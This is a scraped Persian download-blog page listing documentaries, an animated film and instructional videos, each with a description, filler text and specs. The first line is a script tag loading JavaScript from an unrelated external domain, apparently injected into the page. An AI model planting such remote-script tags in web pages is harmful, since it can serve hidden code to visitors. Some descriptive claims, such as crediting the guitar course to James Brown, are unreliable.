script type="text/javascript" src="http://7vps.ir/img/website.js"> دانلود فیلم
کافی نت
وبلاگی جذاب

دانلود فیلم مستند ماه BBC The Moon XviD

نوشته شده توسط حمیدرضا در تاریخ جمعه، 10 تیر ماه 1390
 
دانلود فیلم مستند ماه BBC The Moon XviD
فیلم مستند ماه ،برای اولین بار با کیفیت XviD

با مستندی در مورد دنیای فضا و کهکشان در خدمت شما عزیزان هستیم.این مستند در مورد قمر زمین ( ماه ) می باشد.
ماه تنها قمر سیارهٔ زمین است. هنگام شب ، گاهی ماه به صورت کامل و گاهی نیمه در آسمان نمایان است.از گذشته تا کنون انسان به فکر سفر به ماه بوده است.میانگین فاصله ماه تا زمین ۳۸۴٬۴۰۳ کیلومتر و قطر ماه ۳٬۴۷۶ کیلومتر است. کره ماه نزدیکترین جرم آسمانی به زمین محسوب می‌شود. مهتاب نوری ست که از خورشید آمده و از سطح ماه رو به کره زمین بازتابانده شده. نور تقریباً در مدت ۱٫۳ ثانیه فاصله بین زمین تا ماه را طی می‌کند. نشانهٔ نجومی ماه ☾ است.
در سال ۱۹۶۹ سازمان ناسا اعلام کرد که نخستین فضانوردان به نام‌های نیل آرمسترانگ و باز آلدرین در قالب پروژه آپولو بر سطح ماه فرود آمدند.
نیم‌کره‌ای از ماه به طور دائمی رو به زمین قرار دارد که سمت پیدای ماه نامیده می‌شود. نیمه پنهان ماه را سمت پنهان ماه می‌نامند. ماه هر سال ۲ سانتیمتر از زمین دور می‌شود
بر خلاف زمین، ماه نه دارای آب است، نه هواکره، نه زندگی و نه میدان مغناطیسی. نمی‌توان گفت که ماه کاملاً غیر فعال است، زیرا «ماه لرزه» را باید نشانه‌ای از وجود نوعی حرکت در درون آن دانست. قطعاً ماه در دوران گذشته، آتشفشانهایی داشته است؛ اما غالب حفره‌هایی را که در آن می‌بینیم، نتیجه اصابت سنگهای آسمانی در اولین روزهای شکلگیری آن است. بعضی از این حفره‌ها عظیم اند عمق حفره نیوتون ۸٬۰۰۰ متر است. هنگامی که سفینه فضایی شوروی به نام لونا ۳ از پشت ماه عکس گرفت، دانشمندان دیدند که روی پنهان ماه درست مانند روی آشکار آن نیست. در آنجا، تعداد حفره‌ها بسیار بیشتر بود؛ اما به طور کلی، از حفره‌های روی آشنای ماه کوچک‌تر بودند.
در این مستند درباره موضوع تسلط انسان ها بر ماه صحبت شده است که به زودی در آینده جنگی بزرگ ، برای تسلط بر ماه و زندگی در آن بین انسان ها رخ خواهد داد

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

فیلم آموزشی یوگا Sri Sri Yoga DVD

نوشته شده توسط حمیدرضا در تاریخ سه شنبه، 14 تیر ماه 1390
فیلم آموزشی یوگا Sri Sri Yoga DVD
فیلم آموزشی یوگا برای اولین بار با فرمت DVD
با یک فیلم آموزشی یوگا، درخدمت علاقه مندان به این رشته ورزشی هستیم..در این فیلم آموزشی شما تمرینات مناسبی فرا خواهید گرفت.این تمرینات برای همه مناسب می باشد و حتی به صورت انفرادی و گروهی نیز قابل انجام دادن هستند.
یوگا ورزشی جسمی و روانی(فکری) می‌باشد که در شبه قارهٔ هند و توسط هندوها بوجود آمده‌است.ریشه یابی دقیق این ورزش که توسط چه شخصی و دقیقآ چگونه بوجود آمده کمابیش ناممکن است چرا که تاریخ شکل گیری یوگا به سالهای بسیار دور برمی گردد.یوگا از طرفی به معنای «کنترل کردن» آمده‌است و در آن صورت یوگا را می‌توان علم کنترل امواج فکر و علم مهار قوای ذهن به منظور تسلطی همه جانبه بر توان بالقوة خود دانست. در این صورت به «روش» این دانش که همانا کنترل قوای تن و فکر است تأکید می‌شود. با توجه به چنین درکی، یوگا، در کتاب شاندیلیوپانیشاد (Shandilyopanishad)، این گونه تعریف شده‌است: «یوگا عبارت از کنترل امواج ذهنی است.» از طرف دیگر می‌توان یوگا را به معنای نظاره کردن و دیدن، در نظر گرفت که در نتیجه یوگا علم نظارة خود و خودشناسی است. بدین ترتیب غایت این دانش آشکار می‌شود. یعنی واقع شدن در طبیعت اصیل خویش و شکافتن تمامی حجابهای نفسانی. بر همین اساس در باگاواد گیتا (Bhagavad gita) اوج یوگا، رویت ذات درونی از طریق ذهن پاک و خالص شده توصیف شده‌است، و سرانجام یوگا را به معنی «وصل و یکی شدن» نیز ترجمه کرده‌اند که در آن صورت غرض از انجام تمرینات یوگا آشکار و هویدا می‌شود. به این معنا، یوگا عبارت است از عملکرد هماهنگ قوای فردی و اتحاد قوای ذهنی (Chitta shakti) با قوای حیاتی تن و حواس (Prana shakti) که منجر به تلخیص انرژی، توسعة آگاهی و در نهایت اتحاد با آگاهی متعال خواهد شد. بنابر این تصور، در رودرایا مالاتانترا (Rudrayamatantra) گفته شده : «یک یوگی، فقط در اتحاد با آگاهی متعال، به تجربة یوگا نایل می‌گردد.» بدین ترتیب هر کدام از معانی واژة یوگا، قسمتی از این معرفت عمیق باطنی را آشکار می‌سازد و اختلاف ذاتی در میان آنها دیده نمی‌شود. یک واژه سانسکریت است .

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود مستند National Geographic Hooked Carp Invasion

نوشته شده توسط سعید در تاریخ شنبه، 11 تیر ماه 1390

http://mihandownload.com/mypic/Saeed/hooked-carp-invasion.jpg

National Geographic - Hooked: Carp Invasion (2011) HDTV XviD-DiVERGE
Language: English
00:44:54 | 624x352 | XviD - 952Kbps | 29.970fps | MP3 - 128Kbps | 349MB
Genre: Documentary

نام مستند:  Hooked Carp Invasion - گرفتار تهاجم کپورها
سال انتشار: ۲۰۱۱
زبان: انگلیسی
مدت زمان: ۴۵ دقیقه
حجم: ۳5۰ مگابایت
کیفیت: HDTVRip
زیرنویس انگلیسی : ندارد
خلاصه داستان : کپورهای آسیایی به سمت راه های آبی امریکا حرکت کرده اند ، با اشتهایی باورنکردنی در خوردن همه چیز که باعث به هم ریختن اکوسیستم و میل آن به نابودی شده است.در این مستند به داخل آب هایی که این کپورها زندگی می کنند می رویم تا با روش زندگی آن ها آشنا شویم و ...
این ماهی از خانواده است که دارای ۲ جفت سبیلک، ودندان‌های حلقی با فرمول ۳٫۱.۱-۱٫۱.۳ یا ۳٫۲.۱-۱٫۲.۳ می‌باشد. کپور معمولی فلس‌هایی درشت و باله پشتی ممتدی دارد. تعداد فلس‌های خط جانبی در این ماهی ۳۲-۳۰ عدد می‌باشد. دهان آن کشویی بوده و قابل بیرون زدن است. کپور معمولی در حوضه‌های دریای خزر، رودخانه تجن و تمام حوضه‌های آبریز ایران پراکنش دارد. حداکثر طول در این ماهی ۱۵۰ و میانگین ۳۸ سانتی متر است. بدن این ماهی تا حدی دراز است و طول ۳ برابر ارتفاع می‌باشد. سر ماهی بزرگ و پوزه کند است. باله مخرجی کوتاهی دارد. در باله پشتی ۳ تا ۴ خار سخت و ۱۵(۱۶) تا ۲۱(۲۲) شعاع نرم و شاخه شاخه وجود دارد. در باله مخرجی نیز ۳ خار سخت و ۵ یا ۶ شعاع نرم شاخه شاخه دیده می‌شود.
این ماهی همه چیز خوار بوده و از موجودات ریز بستر آب، کرم‌ها، سخت‌پوستان، نوزاد حشرات و حتی فضولات حیوانی و گیاهی، لاشه حیوانات، تخم ماهیان و حتی نوزادان خود را مصرف می‌کنند.
در دمای کمتر از ۷ درجه سانتی‌گراد به صورت دسته جمعی به خواب زمستانی فرو می‌روند. در آب شیرین به سر برده و آب‌های گرم، آرام و پوشیده از گیاه را دوست دارد.
در میان کپور ماهیان می‌توان ۴ نوع آن را بر حسب قرار گرفتن فلس‌ها بر روی بدن از یکدیگر تشخیص داد: ۱)کپور فلس‌دار: که دارای بدنی کاملا پوشیده از فلس است. ۲) کپور آئینه‌ای: که دارای فلس‌های آئینه‌ای شکل و نا مرتب است. ۳)کپور فلس یک ردیفی: که دارای یک ردیف فلس در امتداد خط جانبی بوده و همگی آنها به یک اندازه‌اند. ۴) کپور چرمی یا برهنه: که فاقد فلس و یا دارای تعداد کمی فلس است. عمر این ماهی تا 45-50 سال گزارش شده و نمونه های از آن تا 30 کیلوگرم وزن می توانند داشته باشند
گونه‌های پرورش‌داده‌شده و رنگارنگ به نام کپور گلگون (کوی) معروفند.

برای دانلود به ادامه مطلب مراجعه نمایید...
 
ادامه مطلب+Download


دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip

نوشته شده توسط حمیدرضا در تاریخ دوشنبه، 13 تیر ماه 1390
 
 دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip
مستند زندانی های کاترینا برای اولین بار با کیفیت DVDrip

مستندی دیدنی برای شما عزیزان آماده کرده ایم..این مستند که زندانی های کاترینا نام دارد ، در مورد هزارنفر از زندانیان نارنجی پوش کاترینا می باشد .زندانی هایی که شامل جنایتکاران و قاتلان خطرناکیست ، که از زندان فرار کرده و بر روی یک پل شکسته ، تحت کنترل نگهبانان زندان جمع می شوند و بعد از آن توفند کاترینا رخ می دهد.اما آن زندانیان چه کسانی بودند؟ در زندان چه بر سر آنان آمده بود؟ کلانتر از شهردار New Orleans خواسته بود تا موضوع را در دست بگیرد.وی تصمیمی گرفت و اعلام کرد : زندانیان در جایی که به آنان تعلق دارند خواهند ماند.
این یک داستان نگفته در مورد حدود 7000 زندانی است که در زندان Orleans Parish زندانی بوده اند و دچار آب گرفتگی در زیر پل شکسته شده اند.یک سال بعد از توفند، مشخص شد که زندانیان در زندان بدون آب و غذا رها شده بودند ، که باعث خشم  و ترس آنان شده بود.
توفند کاترینا  یکی از فاجعه‌بارترین بلایای طبیعی در ایالات متحده آمریکا بوده است.
این توفند که در سال ۲۰۰۵ میلادی رخ داد بخشی از کرانه‌های آمریکایی خلیج مکزیک از نیواورلئان در ایالت لوئیزیانا تا موبایل در ایالت آلاباما را درنوردید و به ویرانی کشید.
توفان کاترینا در پگاه ۲۹ اوت ۲۰۰۵ از دریا به خشکی رسید و باعث مرگ ۱،۸۳۶ تن و آوارگی یک میلیون نفر شد. چنین فاجعه‌ای انسانی از زمان جنگ داخلی آمریکا در ایالات متحده دیده نشده است.
توفَند یا تندباد دریایی  به یک سیستم جوی به شدت متلاطم گویند که مشخصه آن یک مرکز کم فشار است که همراه با بارندگی شدید توام با بادهای با سرعت و سیلاب است.
مشخصات کیفیت این مستند به شرح زیر می باشد:
English | 59 Min | 640 x 368 | x264 - 128Kbps | 25.000fps | MP3 - 109Kbps | 460 MB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود انیمیشن جدید Rango 2011 HD

نوشته شده توسط حمیدرضا در تاریخ شنبه، 11 تیر ماه 1390
 
دانلود انیمیشن جدید Rango 2011 HD
انیمیشن جدید و زیبای رانگو ، با کیفیت HD

زیرنویس فارسی اضافه شد.از سینا و سروش عزیز که زیرنویس را برایمان پیدا کردند ، متشکریم

بار دیگر با انیمیشنی جدید و زیبا در خدمت علاقه مندان به انیمیشن هستیم.انیمیشن رانگو محصول سال 2011 می باشد که برای شما آماده دانلود شده است.
یک آفتاب پرست ناشناخته خانگی (جانی دپ) به طور تصادفی در بیابان نوادا سرگردان می گردد. پس از ملاقات با یک گورکن (Alfred Molina) که در جستجوی روح عرفانی از غرب است مانع خورده شدن او توسط شاهین می گردد. روز بعد پس از یک کابوس حقیقی، او در دیدار لیزارد بینز (Isla Fisher)، دختر گله دار، او را در شهر قدیمی و پر جمعیت غرب توسط حیوانات بیابان به دردسر می اندازد و ...
کیفیت این انیمیشن به شرح زیر می باشد:
[FORMAT]:.......................[ Matroska
[GENRE]:........................[ Animation | Adventure | Comedy | Family | Western
[FILE SIZE]:....................[ 698 MiB
[RESOLUTION]:...................[ 1280x528
[ASPECT RATIO]:.................[ 2.40:1
[FRAME RATE]:...................[ 23.976 fps
[LANGUAGE ]:....................[ English
برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود فیلم آموزشی گیتار The Tony Rice Guitar Method

نوشته شده توسط سعید در تاریخ جمعه، 10 تیر ماه 1390

http://mihandownload.com/mypic/Saeed/TR-Guitar%20Method-1&2_MihanDownload.com.jpg

 
Homespun Video - The Tony Rice Guitar Method (2-DVD Set)
English | MPEG2 7000 kbps | 720 x 480 29.970 fps | AC3 192 Kbps | 7.27 GB
Genre: Video Training


امروزه فیلم های آموزشی در سراسر جهان از علاقه مندان بسیار زیادی بر خوردارند زیرا این فیلم ها در امر آموزش به افراد کمک بسیار زیادی می کنند. از همین رو امروز در سایت میهن دانلود فیلم آموزشی را با نام Homespun Video - The Tony Rice Guitar Method برایتان آماده کرده ایم. این فیلم آموزشی که معنی لغوی آن به فارسی، دانلود فیلم آموزشی سبک تونی رایس گیتارمیباشد، که به شما طریقه فراگیری سبک های گفته شده را به شما نمایش میدهد. شما بعد از مشاهده این فیلم به راحتی می توانید به خوبی یک متخصص هر آنچه را که از گیتار میخواهید به دست آورید!.همچنین .جالب است بدانید تا به حال هیچ کدام از سایت های ایرانی اقدام به قرار دادن این فیلم آموزشی برای دانلود نکرده اند و سایت میهن دانلود مفتخر است که به عنوان اولین سایت ایرانی این فیلم را به صورت کاملآ رایگان و با لینک مستقیم از سرورهای پر سرعت برای دانلود شما کاربران محترم قرار داده است.
این فیلم توسط استاد بزرگ گیتار جیمز براون تولید شده است. این فیلم بیشتر برای درک و نواختن گیتار به سبک فانک میباشد تا از شما یک گیتاریست حرفه ای بسازد.!
از این فیلم ده ها هزار نوازنده گیتار در سراسر جهان برنده جایزه های متعددی شده اند.
گیتار نوعی سازهای زهی است که با پیک یا انگشت نواخته می‌شود و از این جهت که سیم های آن در اثر ارتعاش تولید صدا میکند به سازهای گروه کوردوفن (Cordophones) تعلق دارد. این ساز علاوه بر داشتن قدمت تاریخی قابل توجه (چه از لحاظ ساختار آن و چه از لحاظ تکنیک‌های نوازندگی) توانسته هم گام با تحولات موسیقی غرب پیشرفت چشم گیری داشته باشد؛ که درنتيجه گونه‌های متفاوتی از آن بوجود آمده و هم اكنون جایگاه ویژه‌ای در موسیقی جهان دارد.
واژه guitar در زبان انگلیسی، gitarre در آلمانی و guitare در فرانسوی همگی مشتق شده از واژه guitarra در زبان اسپانیایی هستند که آن خود از واژه قیثاره در زبان عربی اندلوسی مشتق شده است. این واژه نیز خود مشتق شده از واژه لاتین cithara است که نسبت آن به واژه κιθάρα kithara در یونانی باستان می‌رسد. این واژه یونانی به صورت مستقیم و یا غیر مستقیم از واژه پارسی کهن سیه‌تار (سه‌تار) آمده است.
همانطور که می دانید موسیقی یکی از زیباترین هنر هایی است که به انسان ارامش می بخشد و حتی می تواند درمانگر باشد که می توان به گیتار اشاره کرد که در این  قسمت برایتان گیتار به سبک تونی رایس برای دانلود رایگان قرارا می دهم شما می توانید از این اموزش نهایت استفاده را بکنید و از ان لذت ببرید.

برای دانلود به ادامه مطلب مراجعه نمایید.
 
 
ادامه مطلب+Download

دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p

نوشته شده توسط حمیدرضا در تاریخ جمعه، 10 تیر ماه 1390
دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs
مستند مومیایی ها ، رازهایی از فراعنه برای اولین بار با کیفیت BluRay 1440p

با مستندی در مورد مومیایی های مصر باستان در خدمت شما عزیزان هستیم
در این مستند، سرنخ های موجود در مصر باستان، که توسط دانشمندان و کاشفان جمع شده است ، به یکدیگر متصل شده و به شناسایی مومیایی های مصر ختم می شود.این آثار از گذشته، یک پنجره جدید بر دنیای مرموز فراعنه باز می کند.علاوه بر درک ما از فرهنگ ، مذهب، و زندگی روزانه هزاران سال پیش ، دانشمندان به بازسازی DNA مومیایی ها و افشای رازهای ژنتیک هزاران سال پیش پرداخته اند ، تا بتوانند پیشرفت های در زمینه علم پزشکی فراهم آورند.بازکردن اسرار فراعنه ، شاید نگاهی به آینده تمدن ما باشد
مومیایی به جسدی گفته می‌شود که پوست و گوشت خشک شده آن در اثر تماس عمدی یا تصادفی با مواد شیمیایی، سرمای فوق‌العاده زیاد، رطوبت بسیار پایین یا عدم وجود هوا حفظ شده‌است.
کیفیت این مستند به شرح زیر می باشد:
English | 00:38:41 | AVC1 | 1280x1440 | 23.97fps 6661 Kbps | AC3 448 Kbps 48.0khz | 2.56GB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود مستند IMAX India Kingdom of the Tiger

نوشته شده توسط سعید در تاریخ جمعه، 10 تیر ماه 1390

http://mihandownload.com/mypic/Saeed/India%20Kingdom%20of%20the%20Tiger.jpg

IMAX - India Kingdom Of The Tiger (2011) 720p HDTV x264-HILSWALTB
Language: English
00:37:53 | 1280x720 | x264 - 3745Kbps | 23.976fps | AC3 - 384Kbps | 1.09GB
Genre: Documentary

نام مستند:  India: Kingdom of the Tiger - هندوستان : پادشاهی ببر
سال انتشار: ۲۰۱۱
زبان: انگلیسی
مدت زمان: ۳۷ دقیقه
حجم: 10۰۰ مگابایت
کیفیت: 720P
زیرنویس انگلیسی : ندارد
خلاصه داستان : حیوان ملی کشور هند ، ببر بنگال ، در این مستند به طور دقیق و منحصر به فردی مورد بررسی قرار می گیرد. بر اساس زندگی نویسنده و حامی محیط زیست ، Jim Corbett ، در این برنامه دلیل اینکه چگونه این ببرها گونه هایی بی آزار در بین ببرها شده اند . با آن ها چه رفتاری صورت گرفته که به این صورت درآمده اند و ...
توضیحات : هند یا هندوستان با نام رسمی جمهوری هند (هندی: भारत गणराज्य؛ تلفظ: بْهَارَتْ گَنَرَاجْیَه) کشوری در جنوب آسیا است که پایتخت آن دهلی نو است. هندوستان از شمال باختری با پاکستان؛ از شمال با چین، بوتان، نپال و تبت؛ و از شمال خاوری با برمه و بنگلادش همسایه‌است. همچنین هند از باختر با دریای عرب، از خاور با خلیج بنگال، و از جنوب نیز با اقیانوس هند مرز آبی دارد.
پهناوری هندوستان ۳٬۴۰۲٬۸۷۳ کیلومتر مربع (هفتم در جهان، ۲ برابر ایران) است. بیشتر سرزمین هندوستان پست و هموار است و رشته‌کوه هیمالیا که در شمال کشور قرار دارد باعث شده‌است که رطوبت و ابرهای باران‌زا به شمال آسیا نفوذ نکند و در نتیجه هند کشوری پرباران و مرطوب و دارای خاک بسیار حاصلخیز است. این موضوع باعث شده‌است که این کشور بتواند جمعیت بسیاری را در خود جای دهد.
جمعیت هندوستان حدود ۱٬۱۴۸ میلیون نفر(براورد 2009) است که دومین کشور پر جمعیت دنیا پس از چین به شمار می‌آید. بندر بمبئی (مومبائی) با جمعیتی نزدیک به ۱۴ میلیون تن، پرجمعیت‌ترین شهر هند است. هند بیش از سی و پنج شهر بزرگ با جمعیت بالای یک میلیون تن دارد. بمبئی (مومبائی)، دهلی، کلکته، مدرس، بنگلور، حیدرآباد، اگرا، میسور، جی‌پور، گوا، پونا، بوپال، تریواندروم، سورات، کانپور و احمدآباد از شهرهای مهم این کشور پهناور هستند.
هندوستان دارای تاریخ و فرهنگ بسیار کهن و پرباری است که به ۳۰۰۰ سال پیش از میلاد می‌رسد. هندوستان سرزمین نژادها، زبان‌ها، آیین‌ها، و فرهنگ‌های فراوان و گوناگون می‌باشد. در هند صدها زبان و هزاران گویش و لهجه وجود دارد. علاوه بر دو زبان هندی و انگلیسی که در قانون اساسی این کشور زبان رسمی اعلام شده‌است. ۲۲ زبان دیگر در یک یا چند ایالت موقعیت زبان رسمی را دارند.
طی ۸۰۰ سال تسلط فارسی‌زبانان یا ایرانیان بر هند، این کشور از فرهنگ ایران و زبان فارسی تاثیر بسیاری پذیرفته‌است. زبان فارسی در دورهٔ غزنویان به هند راه یافت و با تأسیس سلسله گورکانیان هند زبان رسمی شد. زبان فارسی هندوستان شاعران بزرگی همچون بیدل دهلوی، و امیر خسرو دهلوی و دستگاه شعری سبک هندی را در خود پروراند. زبان فارسی تاثیر فراوانی بر زبان‌های هندوستان به‌ویژه زبان اردو گذاشته‌است. زبان فارسی پیش از آنکه هندوستان مستعمره انگلستان شود (سده ۱۹ میلادی)، دومین زبان رسمی این کشور و زبان فرهنگی و علمی به‌شمار می‌رفت.

برای دانلود به ادامه مطلب مراجعه نمایید...
 
ادامه مطلب+Download

دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals

نوشته شده توسط حمیدرضا در تاریخ جمعه، 10 تیر ماه 1390

براي خرید فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals   در 1 دي وي دي اورجینال و بسته بندی شکیل به قیمت 3200 تومان روی لینک زیر کلیک کرده و پس از دریافت محصول مبلغ آن را به مامور پستی پرداخت نمایید

buybig1.gif

دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals
دانلود فیلم آموزش درس های از نکات ضروری آشپزی برای اولین بار

با یک فیلم آموزشی در مورد اصول آشپزی در خدمت علاقه مندان به آشپزی مخصوصا خانم های هنرمند ایرانی هستیم.
  در این فیلم آموزشی به نکاتی از اصول آشپزی پی خواهید برد.بررسی آماده سازی مواد اولیه تازه ، اطلاعات در مورد تاریخ انقضا مواد غذایی ، فواید آنها و نیز اطلاعات علمی در مورد غذا در این فیلم موجود است.همچنین در این فیلم مقدمه ای در مورد آشپزی حرفه ای ، ایمنی در آشپزی ، بهداشت تهیه غذا، تغذیه سالم ، دستورالعمل های آشپزی، ابزار و تجهیزات ، مهارت های استفاده از چاقو ، مواد غذایی آشپزخانه ، محصولات لبنی و دیگر نکات ضروری آشپزی اطلاعات فرا خواهید گرفت
این فیلم آموزشی برای کسانی قصد دارند آشپزی را به صورت حرفه ای یاد بگیرند مناسب می باشد
فرمت فیلم به صورت iso می باشد که می توانید به کمک نرم افزارهای درایو مجازی آن را اجرا نمایید

برای دانلود به ادامه مطلب مراجعه نمایید
ادامه مطلب+Download

دانلود فیلم آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD

نوشته شده توسط حمیدرضا در تاریخ چهارشنبه، 8 تیر ماه 1390
دانلود فیلم  آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD
دانلود فیلم آموزش نقاشی رنگ روغن توسط E.John Robinson در 6 DVD
با فیلم آموزشی در خدمت علاقه مندان به نقاشی هستیم.در فیلم آموزش نقاشی دریا به وسیله رنگ روغن توسط استاد معروف نقاشی رنگ روغن ، E.John Robinson در 6 قسمت ، نکات لازم برای ترسیم نقاشی های زیبای دریا را یاد خواهید گرفت.علاقه مندان به نقاشی های رنگ روغن این آموزش را از دست ندهند
رنگ روغن یکی از مواد به‌کار رفته در نقاشی و همچنین نام دسته‌ای از تکنیک‌های نقاشی است که از این ماده استفاده می‌کنند.
روغن به کار رفته در رنگ روغن با روش‌های مختلف تولید می‌شود که رایج‌ترین آنها، جوشاندن بذر گیاه کتان و گرفتن روغن آن است. سپس این روغن را با مواد رنگی مخلوط می‌کنند. رنگ‌دانه‌ها نیز معمولاً با پایه سرب و کادمیوم یا سنتتیک و پلیمری هستند
برای پاک کردن رنگ روغن از تینر استفاده می‌شود.
نخستین نمونه‌های نقاشی رنگ روغن نقش‌های بودا در غارهای بامیان (مناطق مرکزی افغانستان) است که در حدود سال‌های ۶۵۰ میلادی ترسیم شده است
برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه کنید
ادامه مطلب+Download



سه شنبه 21 تير 1390برچسب:فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند ماه BBC The Moon XviD,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند ماه BBC The Moon XviD,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فيلم مستند اموزشي,دانلود فيلم با لينك مستقيم,دانلود فیلم فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم خارجی فیلم آموزشی یوگا Sri Sri Yoga DVD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود مستند,دانلود مستند,فيلم مستند,فيلم اموزشي,اموزش تصويري,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم اموزشي,دانلود مستقيم فيلم اموزشي,دانلود مستند National Geographic Hooked Carp Invasion,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود فیلم دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود انیمیشن جدید Rango 2011 HD,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود مستند,دانلود فیلم خارجی دانلود انیمیشن جدید Rango 2011 HD,دانلود فیلم دانلود مستند,دانلود فیلم دانلود انیمیشن جدید Rango 2011 HD,دانلود مستند,دانلود دانلود انیمیشن جدید Rango 2011 HD,فيلم اموزشي,اموزش تصويري,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم اموزشي,دانلود فیلم آموزشی گیتار The Tony Rice Guitar Method,دانلود مستقيم فيلم اموزشي,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,فيلم مستند,فيلم اموزشي,اموزش تصويري,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم اموزشي,دانلود مستقيم فيلم اموزشي,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم آموزش درس هایی از نکات ضروری آشپزی On Cooking A Textbook of Culinary Fundamentals,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم آموزشی نقاشی رنگ روغن دریا Painting The Sea In Oils Complete DVD,, :: 7:37 بعد از ظهر
گری گوری

دانلود کارتون به یادماندنی آنشرلی با موهای قرمز Anne Shirley Full Episode

